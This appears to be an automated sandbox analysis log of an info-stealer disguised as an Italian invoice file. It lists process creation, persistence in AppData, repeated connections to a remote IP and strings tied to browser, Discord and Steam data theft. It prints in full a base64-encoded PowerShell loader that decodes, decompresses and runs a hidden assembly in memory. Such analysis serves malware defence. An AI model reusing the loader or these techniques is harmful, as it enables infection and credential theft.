Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000006386000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.00000000061E6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000006386000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.00000000061E6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: powershell.pdbUGP source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312087444.00000000003D1000.00000020.00000001.01000000.00000005.sdmp, OSDescription.vbs.exe, 0000000F.00000000.1514068078.0000000000348000.00000020.00000001.01000000.0000000C.sdmp, OSDescription.vbs.exe.13.dr, Fattura-24SC-99245969925904728562.vbs.exe.4.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: powershell.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312087444.00000000003D1000.00000020.00000001.01000000.00000005.sdmp, OSDescription.vbs.exe, 0000000F.00000000.1514068078.0000000000348000.00000020.00000001.01000000.0000000C.sdmp, OSDescription.vbs.exe.13.dr, Fattura-24SC-99245969925904728562.vbs.exe.4.dr
Source:	Binary string: protobuf-net.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 4x nop then jmp 0A033B28h	7_2_0A033A68
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 4x nop then jmp 0A033B28h	7_2_0A033A70
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	7_2_0A0386F9
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	7_2_0A038700
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	7_2_0A0ED8F8
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	15_2_09CAD8F8
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 4x nop then jmp 09CE3B28h	15_2_09CE3A68
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 4x nop then jmp 09CE3B28h	15_2_09CE3A70
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	15_2_09CE8700
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	15_2_09CE86F9

Source: global traffic

TCP traffic: 192.168.2.7:49706 -> 185.36.141.107:7702

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.7:49740
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.7:49973

Source: unknown

DNS traffic detected: query: 90.168.9.0.in-addr.arpa replaycode: Name error (3)

Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown	TCP traffic detected without corresponding DNS query: 185.36.141.107

Source: global traffic

DNS traffic detected: DNS query: 90.168.9.0.in-addr.arpa

Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1357497221.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1390938323.0000000005DDC000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000049F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000048A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000049F3000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1539348684.000000000277E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000048A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000049F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1632367660.0000000004063000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://icanhazip.com/
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1390938323.0000000005DDC000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005095000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000274E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000274E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000274E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud

Malicious encrypted Powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQ